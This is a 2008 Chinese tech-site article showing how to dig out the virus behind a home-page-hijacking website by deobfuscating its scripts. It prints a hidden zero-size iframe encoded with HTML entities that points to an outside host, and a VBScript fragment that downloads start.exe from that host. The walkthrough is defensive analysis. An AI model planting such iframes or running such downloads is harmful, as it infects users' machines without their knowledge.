太平洋汽车网 | 太平洋游戏网 | 太平洋女性网 | 太平洋亲子网 | PC购物网  网站地图  
太平洋电脑网
首    页
产业资讯
行情报价产品库
数据调研评测室
服 务 器网络设备
方案应用办公设备
软件资讯产品论坛PCclub社区
下载中心软件论坛摄影部落
渠道商情通信游戏科技奥运
网上商城图库二手招聘培训
diyDIY硬件 手机手  机 笔记本笔记本 台式机台式机

数码世界

数码相机数码相机 随身听MP3/MP4 摄像机摄像机 数字家电数字家电 精品廊精品廊
北京 上海 广州 深圳 香港 广西 重庆 武汉 山东 江苏 辽宁 福建 成都 西安 江西 湖南 黑龙江 台湾
 
 
   
软件 首页 | 资讯 | 应用 | 评测 | 教你学电脑 | 信息安全 | 创意设计 | 开发特区 | 软件下载 | 专题 | 社区
 
软件 特色专区: QQ大本营 | Vista专区 | msn总动员 | 组网专栏 | Photoshop | 视频专栏 | 常用软件
 
您现在的位置: 软件资讯 > 软件应用 > 信息安全 > 黑客攻防战

简单易行 轻松挖出恶意网站中藏的病毒

出处:电脑爱好者[ 2008-03-06 09:31:58 ] 作者:佚名 责任编辑:shiyun

导 读  
  恶意网站的恶劣行径比较可怕,其现象通常是“首页会被改成恶意网站地址”;那么,该如何寻找这些恶意站点中的病毒呢?

  前不久,很多网友都感染了www.7b.com.cn的病毒,首页被改成这个网站,并且无法改回。黑客是如何做到锁定用户的浏览器首页呢?下面我们就去探个究竟。

  提醒:分析病毒存在一定风险,建议在虚拟机下操作。

  第一步 查看www.7b.com.cn首页的源代码,可以发现在尾部有如下的字样:

  <iframe src=&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108 width=0 height=0></iframe>

  这是一个嵌入到7b网址之家首页的页面,即打开www.7b.com.cn也就同时打开了这个页面。

  而“&#104&#116&#116&#112&#58&#47&#47&#109&#46&#100&#97&#115&#104&#111&#119&#46&#99&#111&#109&#46&#99&#110&#47&#109&#46&#104&#116&#109&#108”表示的是一个字符串,“&#”后面是每个字符串ASCII的十进制值。

  直接把这段乱码保存为HTM文件,用IE打开,就可以看到它的真实面目“http://m.dashow.com.cn/m.html”。

  第二步 查看http://m.dashow.com.cn/m.html的源代码,把看的<scrtipt>脚本段中的Execute替换为Document.Write,然后打开这个HTM页面,就会出现一段代码,同样地,把EXECUTE换成我们无敌的Document.Write,前后加脚本标记,存HTM打开。屏幕上立即出现了一段令人眼花的东西。把眼花缭乱的东西整理一下,并将出现的CHR()在前面用到过,作用是把字符的ASCII转成字符,只不过这次是16进制。然后再将字符拼接成字符串,然后再Execute运行这个命令字符串。继续用Document.Write替换掉EXECUTE,前后加脚本标记,存HTM打开。

  第三步 经过上几步的还原后终于看到了这个恶意页面的最终面目。

  on error resume next curl = "http://m.dashow.com.cn/start.exe"……其后省略。

  这段代码中我们可以很清楚地看到http://m.dashow.com.cn/start.exe这个链接。没错,它就是运行后可以将用户主页锁定为www.7b.com.cn的病毒。

  可以用下载工具将这个文件下载下来,如果你的杀毒软件查不到的话最好立即上报。这样可以保证杀毒软件快速查杀这个病毒,并使更少的网友免受该病毒的侵害。

前一页[1] 下一页
下一篇:防泄秘绝招 给电脑“洗澡”
来PConline劲爆论坛抢大奖!马上点击进入网络安全讨论区
 今日论坛热贴推荐
·22项Windows或Mac不能而Linux可以的事
·WindowsXP系统安全实用技巧大合集
·全球网友的选择!Webware100获奖软件下载
·从硬盘安装SUSE Linux10系统的两种方法
·最新!Leah Dizon日本发展后写真壁纸
·假IE病毒兴风作浪 点击广告还释放数十木马
·六招关闭WindowsXP自动播放防止病毒
·微软“最后通牒”到期 未来还有四种选择
·QuickTime中新漏洞 黑客可远程控制Vista
·强烈推荐!美女克劳迪亚-希佛精彩壁纸
更多相关搜索:恶意   网站   病毒   

  发给好友 我要报错 投稿给我们 加入收藏 返回顶部  
相关文章  
·当心骗子利用易趣“钓鱼” 骗取用户密码 [2008-03-05]
·危险的爱:病毒编写者爱上了反病毒产品 [2008-03-05]
·免费啦!NOD32安全套装三个月免费试用 [2008-03-04]
·瑞星年度安全报告:大陆地区病毒泛滥成灾 [2008-03-04]
·每周病毒播报:病毒变种继续危害计算机 [2008-03-04]
·北京居首:中国城市恶意软件感染情况排名 [2008-03-04]
·严防骗子:警惕网络诈骗七种作案手法 [2008-03-03]
·2007年是历史上病毒传播最严重一年 [2008-03-03]

文章搜索
每日更新
 
焦点图文
Fireworks 打造无限宇宙视觉特效
Fireworks 打造无限宇宙视觉特效
Photoshop打造金色咖啡特效壁纸
Photoshop打造金色咖啡特效壁纸
为了安全,关注XP默认设置
为了安全,关注XP默认设置
黑客攻击的最新目标
黑客攻击的最新目标
强取豪夺 提取视频中的声音
强取豪夺 提取视频中的声音
10个能用JavaScript实现的图片特效
10个能用JavaScript实现的图片特效
热门软件推荐
About Us | 关于我们 | 隐私政策 | 广告服务 | 联系我们 | 招聘精英 | 网站律师 | 合作联系 | 友情链接
太平洋专业网站群:  太平洋电脑网 ┊ 太平洋汽车网 ┊ 太平洋游戏网 ┊ 太平洋女性网 ┊ 太平洋亲子网

广东省通信管理局
ICP证粤B2-20040647
互联网清理整顿
技术支持与报障:support@pconline.com.cn
        020-87568837         
对本站有任何建议、意见或投诉,请点这里在线提交.
本网站简体、繁体两种版本,以简体版为准
PConline版权所有,未经授权禁止转载、摘编、复制或建立镜像.如有违反,追究法律责任